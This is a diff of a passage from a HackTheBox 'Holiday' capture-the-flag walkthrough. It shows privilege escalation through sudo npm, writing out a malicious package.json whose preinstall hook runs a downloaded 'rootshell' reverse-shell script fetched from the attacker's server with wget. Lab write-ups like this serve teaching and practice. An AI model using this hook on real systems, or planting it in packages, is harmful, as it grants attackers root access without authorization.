Anymuz/HackTheBox-Walkthroughs/Holiday/Holiday.md

 [creating_JSON]

-First we shall create a JSON package in the expected format by using ``npm init`` as we only need sudo to use the ``npm -i`` feature, this will create an empty ‘package.json’ file for us.
+First we shall create a JSON package in a new directory by using ``npm init`` as we only need sudo to use the ``npm -i`` feature, this will create an empty ‘package.json’ file for us, you may have to reopen your shell after doing this.
 Since this is a simple shell with no job control it will be challenging to edit this file on our target.
 Instead we can manually copy the cat package.json output and paste it into a text editor on our attacking machine.
-Then we can add the command we want executed to our JSON file like shown below.
+Then we can add the command we want executed to our JSON by replacing  ``"test": "echo \"Error: no test specified\" && exit 1"`` with ``"preinstall": "/bin/bash /home/algernon/app/anymuz/rootshell"``.
+Make sure it is within the ``"scripts"`` part of the JSON data, in this case the command will run bash on the new shell that we will download into the directory I created called 'anymuz'.

 ```
-vulnerable json
+{
+  "name": "anymuz",
+  "version": "1.0.0",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "/bin/bash /home/algernon/app/anymuz/rootshell"
+  },
+  "author": "",
+  "license": "ISC"
+}
 ```

 Now, let’s host our modified malicious ‘package.json’ file along with a copy of our original reverse shell bash script with a different port on our python server.
-Once our new files are hosted we can go back to the user shell and download both the new shell (which I named ‘rootshell’) and our malicious ‘package.json’ to a temporary directory using wget.
+Once our new files are hosted we can go back to the user shell, remove the old 'package.json' file and then download both the new shell (which I named ‘rootshell’) and our malicious ‘package.json’ to the temporary directory using wget.

 [wget_stuff]